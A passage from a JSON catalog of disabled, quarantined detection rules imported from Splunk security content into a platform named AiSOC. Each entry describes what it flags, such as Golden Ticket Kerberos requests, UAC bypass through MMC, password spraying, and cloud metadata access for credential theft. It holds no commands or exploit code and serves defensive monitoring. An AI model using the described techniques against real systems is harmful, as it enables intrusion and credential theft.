macro code. It leverages Sysmon EventCode 7 to detect when processes like WINWORD.EXE or EXCEL.EXE load specific DLLs associated with macros (e.g., VBE7.DLL). This activity is significant because macros are a common attack vector for delivering malicious payloads, such as malware. If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the system. Disabling macros by default is recommended to mitigate this risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-loading-vbe7-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7cfec906-2697-43f7-898b-83634a051d9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_loading_vbe7_dll.yml" } }, { "id": "splunk-security-content-7d1f031f-f1c9-43be-8b0b-c4e3e8a8928a", "type": "detection", "name": "Windows New Default File Association Value Set", "description": "The following analytic detects registry changes to the default file association value. It leverages data from the Endpoint data model, specifically monitoring registry paths under \"HKCR\\\\*\\\\shell\\\\open\\\\command\\\\*\". This activity can be significant because, attackers might alter the default file associations in order to execute arbitrary scripts or payloads when a user opens a file, leading to potential code execution. If confirmed malicious, this technique can enable attackers to persist on the compromised host and execute further malicious commands, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-default-file-association-value-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7d1f031f-f1c9-43be-8b0b-c4e3e8a8928a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_default_file_association_value_set.yml" } }, { "id": "splunk-security-content-7d4c618e-4716-11ec-951c-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WinRM and PowerShell Script Block", "description": "The following analytic detects the execution of PowerShell commands that use the `Invoke-Command` cmdlet to start a process on a remote endpoint via the WinRM protocol. It leverages PowerShell Script Block Logging (EventCode=4104) to identify such activities. This behavior is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this activity could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-winrm-and-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7d4c618e-4716-11ec-951c-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_winrm_and_powershell_script_block.yml" } }, { "id": "splunk-security-content-7d90f334-a482-11ec-908c-acde48001122", "type": "detection", "name": "Kerberos Service Ticket Request Using RC4 Encryption", "description": "The following analytic detects Kerberos service ticket requests using RC4 encryption, leveraging Kerberos Event 4769. This method identifies potential Golden Ticket attacks, where adversaries forge Kerberos Granting Tickets (TGT) using the Krbtgt account NTLM password hash to gain unrestricted access to an Active Directory environment. Monitoring for RC4 encryption usage is significant as it is rare in modern networks, indicating possible malicious activity. If confirmed malicious, attackers could move laterally and execute code on remote systems, compromising the entire network. Note: This detection may be bypassed if attackers use the AES key instead of the NTLM hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-service-ticket-request-using-rc4-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7d90f334-a482-11ec-908c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_service_ticket_request_using_rc4_encryption.yml" } }, { "id": "splunk-security-content-7ddf2084-6cf3-4a44-be83-474f7b73c701", "type": "detection", "name": "Azure AD Service Principal Owner Added", "description": "The following analytic detects the addition of a new owner to a Service Principal within an Azure AD tenant. It leverages Azure Active Directory events from the AuditLog log category to identify this activity. This behavior is significant because Service Principals do not support multi-factor authentication or conditional access policies, making them a target for adversaries seeking persistence or privilege escalation. If confirmed malicious, this activity could allow attackers to maintain access to the Azure AD environment with single-factor authentication, potentially leading to unauthorized access and control over critical resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-owner-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ddf2084-6cf3-4a44-be83-474f7b73c701", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_owner_added.yml" } }, { "id": "splunk-security-content-7de17d7a-c9d8-11eb-a812-acde48001122", "type": "detection", "name": "Allow Operation with Consent Admin", "description": "The following analytic detects a registry modification that allows the 'Consent Admin' to perform operations requiring elevation without user consent or credentials. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the 'ConsentPromptBehaviorAdmin' value within the Windows Policies System registry path. This activity is significant as it indicates a potential privilege escalation attempt, which could allow an attacker to execute high-privilege tasks without user approval. If confirmed malicious, this could lead to unauthorized administrative access and control over the compromised machine, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-operation-with-consent-admin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7de17d7a-c9d8-11eb-a812-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_operation_with_consent_admin.yml" } }, { "id": "splunk-security-content-7e03b682-3965-4598-8e91-a60a40a3f7e4", "type": "detection", "name": "Windows Scheduled Task Created Via XML", "description": "The following analytic detects the creation of scheduled tasks in Windows using schtasks.exe with the \"XML\" parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details.\nThis activity is significant as it is a common technique for establishing persistence or achieving privilege escalation, often used by malware like Trickbot and Winter-Vivern. While creating a scheduled task via XML may be legitimate, it can also be abused by attackers. If confirmed malicious, this could allow attackers to maintain access, execute additional payloads, and potentially lead to data theft or ransomware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-created-via-xml.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e03b682-3965-4598-8e91-a60a40a3f7e4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_created_via_xml.yml" } }, { "id": "splunk-security-content-7e3d68db-ea4d-419b-adbd-e14a525ecf09", "type": "detection", "name": "Windows Service Execution RemCom", "description": "The following analytic identifies the execution of RemCom.exe, an open-source alternative to PsExec, used for lateral movement and remote command execution. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, original file names, and command-line arguments. This activity is significant as it indicates potential lateral movement within the network. If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to further compromise and control over additional systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-execution-remcom.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e3d68db-ea4d-419b-adbd-e14a525ecf09", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_execution_remcom.yml" } }, { "id": "splunk-security-content-7e3df743-b1d8-4631-8fa8-bd5819688876", "type": "detection", "name": "Detect Certipy File Modifications", "description": "The following analytic detects the use of the Certipy tool to enumerate Active Directory Certificate Services (AD CS) environments by identifying unique file modifications. It leverages endpoint process and filesystem data to spot the creation of files with specific names or extensions associated with Certipy's information gathering and exfiltration activities. This activity is significant as it indicates potential reconnaissance and data exfiltration efforts by an attacker. If confirmed malicious, this could lead to unauthorized access to sensitive AD CS information, enabling further attacks or privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649", "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-certipy-file-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e3df743-b1d8-4631-8fa8-bd5819688876", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_certipy_file_modifications.yml" } }, { "id": "splunk-security-content-7e80d92a-6ec3-4eb1-a444-1480acfe2d14", "type": "detection", "name": "Crowdstrike Medium Severity Alert", "description": "The following analytic detects a CrowdStrike alert with MEDIUM severity indicates a potential threat that requires prompt attention. This alert level suggests suspicious activity that may compromise security but is not immediately critical. It typically involves detectable but non-imminent risks, such as unusual behavior or attempted policy violations, which should be investigated further and mitigated quickly to prevent escalation of attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-medium-severity-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e80d92a-6ec3-4eb1-a444-1480acfe2d14", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_medium_severity_alert.yml" } }, { "id": "splunk-security-content-7e8458cc-acca-11eb-9e3f-acde48001122", "type": "detection", "name": "Modify ACL permission To Files Or Folder", "description": "The following analytic detects the modification of ACL permissions to files or folders, making them accessible to everyone or to system account. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"cacls.exe,\" \"icacls.exe,\" and \"xcacls.exe\" with specific command-line arguments. This activity is significant as it may indicate an adversary attempting to evade ACLs or access protected files. If confirmed malicious, this could allow unauthorized access to sensitive data, potentially leading to data breaches or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/modify-acl-permission-to-files-or-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e8458cc-acca-11eb-9e3f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/modify_acl_permission_to_files_or_folder.yml" } }, { "id": "splunk-security-content-7e9a5a2c-2f1a-4b6a-9a4b-9e7d9c8f5a21", "type": "detection", "name": "Cisco Secure Firewall - Static Tundra Smart Install Abuse", "description": "This analytic detects activity associated with \"Static Tundra\" threat actor abuse of the Cisco Smart Install (SMI) protocol\nusing Cisco Secure Firewall Intrusion Events. It leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to\nidentify occurrences of Smart Install exploitation and protocol abuse, including denial-of-service and buffer overflow\nattempts. The detection triggers when multiple Cisco Smart Install-related Snort signatures are observed in a short period from the\nsame source, which is indicative of active exploitation or reconnaissance against Cisco devices that expose SMI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-static-tundra-smart-install-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e9a5a2c-2f1a-4b6a-9a4b-9e7d9c8f5a21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___static_tundra_smart_install_abuse.yml" } }, { "id": "splunk-security-content-7e9c3f8a-4b2d-4c5e-9a1f-6d8e5b3c2a9f", "type": "detection", "name": "Cisco ASA - Packet Capture Activity", "description": "This analytic detects execution of packet capture commands on Cisco ASA devices via CLI or ASDM.\nAdversaries may abuse the built-in packet capture functionality to perform network sniffing, intercept credentials transmitted over the network, capture sensitive data in transit, or gather intelligence about network traffic patterns and internal communications. Packet captures can reveal usernames, passwords, session tokens, and confidential business data.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing \"capture\" commands, which are used to initiate packet capture sessions on specific interfaces or for specific traffic patterns on the ASA device.\nInvestigate unauthorized packet capture activities, especially captures targeting sensitive interfaces (internal network segments, DMZ), captures configured to capture large volumes of traffic, captures with suspicious filter criteria, captures initiated by non-administrative accounts, or captures during unusual hours.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-packet-capture-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e9c3f8a-4b2d-4c5e-9a1f-6d8e5b3c2a9f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___packet_capture_activity.yml" } }, { "id": "splunk-security-content-7eb9c3d5-c98c-4088-acc5-8240bad15379", "type": "detection", "name": "GetCurrent User with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments invoking the `GetCurrent` method of the WindowsIdentity .NET class. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use this method to identify the logged-in user on a compromised endpoint, aiding in situational awareness and Active Directory discovery. If confirmed malicious, this could allow attackers to gain insights into user context, potentially facilitating further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getcurrent-user-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7eb9c3d5-c98c-4088-acc5-8240bad15379", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getcurrent_user_with_powershell.yml" } }, { "id": "splunk-security-content-7ed272a4-9c77-11eb-af22-acde48001122", "type": "detection", "name": "Windows Multiple Users Failed To Authenticate From Host Using NTLM", "description": "The following analytic identifies a single source endpoint failing to authenticate with 30 unique valid users using the NTLM protocol. It leverages EventCode 4776 from Domain Controller logs, focusing on error code 0xC000006A, which indicates a bad password. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this activity could lead to unauthorized access to sensitive information or further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-failed-to-authenticate-from-host-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ed272a4-9c77-11eb-af22-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_failed_to_authenticate_from_host_using_ntlm.yml" } }, { "id": "splunk-security-content-7f04349c-e30d-11eb-bc7f-acde48001122", "type": "detection", "name": "UAC Bypass MMC Load Unsigned Dll", "description": "The following analytic detects the loading of an unsigned DLL by the MMC.exe application, which is indicative of a potential UAC bypass or privilege escalation attempt. It leverages Sysmon EventCode 7 to identify instances where MMC.exe loads a non-Microsoft, unsigned DLL. This activity is significant because attackers often use this technique to modify CLSID registry entries, causing MMC.exe to load malicious DLLs, thereby bypassing User Account Control (UAC) and gaining elevated privileges. If confirmed malicious, this could allow an attacker to execute arbitrary code with higher privileges, leading to further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.014", "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/uac-bypass-mmc-load-unsigned-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f04349c-e30d-11eb-bc7f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/uac_bypass_mmc_load_unsigned_dll.yml" } }, { "id": "splunk-security-content-7f1c8bed-9bd4-40b0-a1df-c262cbade0fc", "type": "detection", "name": "MacOS Data Chunking", "description": "The following analytic detects suspicious data chunking activities that involve the use of split or dd, potentially indicating an attempt to evade detection by breaking large files into smaller parts.\nAttackers may use this technique to bypass size-based security controls, facilitating the covert exfiltration of sensitive data.\nBy monitoring for unusual or unauthorized use of these commands, this analytic helps identify potential data exfiltration attempts, allowing security teams to intervene and prevent the unauthorized transfer of critical information from the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-data-chunking.yaml", "provenance": { "source": "splunk/security_content", "source_id": "7f1c8bed-9bd4-40b0-a1df-c262cbade0fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_data_chunking.yml" } }, { "id": "splunk-security-content-7f2e1a9a-1e8e-4d2e-8b7c-5f2c3d6a9b21", "type": "detection", "name": "Cisco Isovalent - Access To Cloud Metadata Service", "description": "The following analytic detects workloads accessing the cloud instance metadata service at 169.254.169.254. This IP is used by AWS, GCP and Azure metadata endpoints and is frequently abused in SSRF or lateral movement scenarios to obtain credentials and sensitive environment details. Monitor unexpected access to this service from application pods or namespaces where such behavior is atypical.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-access-to-cloud-metadata-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f2e1a9a-1e8e-4d2e-8b7c-5f2c3d6a9b21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___access_to_cloud_metadata_service.yml" } }, { "id": "splunk-security-content-7f398cfb-918d-41f4-8db8-2e2474e02222", "type": "detection", "name": "High Number of Login Failures from a single source", "description": "The following analytic detects multiple failed login attempts in Office365 Azure Active Directory from a single source IP address. It leverages Office365 management activity logs, specifically AzureActiveDirectoryStsLogon records, aggregating these logs in 5-minute intervals to count failed login attempts. This activity is significant as it may indicate brute-force attacks or password spraying, which are critical to monitor. If confirmed malicious, an attacker could gain unauthorized access to Office365 accounts, leading to potential data breaches, lateral movement within the organization, or further malicious activities using the compromised account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-number-of-login-failures-from-a-single-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f398cfb-918d-41f4-8db8-2e2474e02222", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/high_number_of_login_failures_from_a_single_source.yml" } }, { "id": "splunk-security-content-7f4b9b8e-5d6a-4a21-9e3f-0f1e8f2d1c3a", "type": "detection", "name": "Cisco Isovalent - Late Process Execution", "description": "Detects process executions that occur well after a container has initialized, which can indicate\nsuspicious activity (e.g., interactive shells, injected binaries, or post-compromise tooling).\nThe analytic compares the process start time to the container start time and flags processes\nlaunched more than 5 minutes (300 seconds) after initialization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-late-process-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f4b9b8e-5d6a-4a21-9e3f-0f1e8f2d1c3a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___late_process_execution.yml" } }, { "id": "splunk-security-content-7f5fb3e1-4209-4914-90db-0ec21b556368", "type": "detection", "name": "Hosts receiving high volume of network traffic from email server", "description": "The following analytic identifies hosts receiving an unusually high volume of network traffic from an email server. It leverages the Network_Traffic data model to sum incoming bytes to clients from email servers, comparing current traffic against historical averages and standard deviations. This activity is significant as it may indicate data exfiltration by a malicious actor using the email server. If confirmed malicious, this could lead to unauthorized data access and potential data breaches, compromising sensitive information and impacting organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hosts-receiving-high-volume-of-network-traffic-from-email-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f5fb3e1-4209-4914-90db-0ec21b556368", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/hosts_receiving_high_volume_of_network_traffic_from_email_server.yml" } }, { "id": "splunk-security-content-7f5fb3e1-4209-4914-90db-0ec21b556378", "type": "detection", "name": "Email servers sending high volume traffic to hosts", "description": "The following analytic identifies a significant increase in data transfers from your email server to client hosts. It leverages the Network_Traffic data model to monitor outbound traffic from email servers, using statistical analysis to detect anomalies based on average and standard deviation metrics. This activity is significant as it may indicate a malicious actor exfiltrating data via your email server. If confirmed malicious, this could lead to unauthorized data access and potential data breaches, compromising sensitive information and impacting organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/email-servers-sending-high-volume-traffic-to-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f5fb3e1-4209-4914-90db-0ec21b556378", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/email_servers_sending_high_volume_traffic_to_hosts.yml" } }, { "id": "splunk-security-content-7f5fb3e1-4209-4914-90db-0ec21b936378", "type": "detection", "name": "SMB Traffic Spike", "description": "The following analytic detects spikes in Server Message Block (SMB) traffic connections, which are used for sharing files and resources between computers. It leverages network traffic logs to monitor connections on ports 139 and 445, and SMB application usage. By calculating the average and standard deviation of SMB connections over the past 70 minutes, it identifies sources exceeding two standard deviations from the average. This activity is significant as it may indicate potential SMB-based attacks, such as ransomware or data theft. If confirmed malicious, attackers could exfiltrate data or spread malware within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/smb-traffic-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f5fb3e1-4209-4914-90db-0ec21b936378", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/smb_traffic_spike.yml" } }, { "id": "splunk-security-content-7f6b8a95-3fb7-429a-8c53-e5d4f8d92a10", "type": "detection", "name": "Windows MSC EvilTwin Directory Path Manipulation", "description": "The following analytic detects potential MSC EvilTwin loader exploitation, which manipulates directory paths with spaces to bypass security controls. The technique, described as CVE-2025-26633, involves crafting malicious MSC files that leverage MUIPath parameter manipulation. This detection focuses on suspicious MSC file execution patterns with unconventional command-line parameters, particularly those containing unusual spaces in Windows System32 paths or suspicious additional parameters after the MSC file. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code with elevated privileges through DLL side-loading or path traversal techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1036.005", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msc-eviltwin-directory-path-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f6b8a95-3fb7-429a-8c53-e5d4f8d92a10", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msc_eviltwin_directory_path_manipulation.yml" } }, { "id": 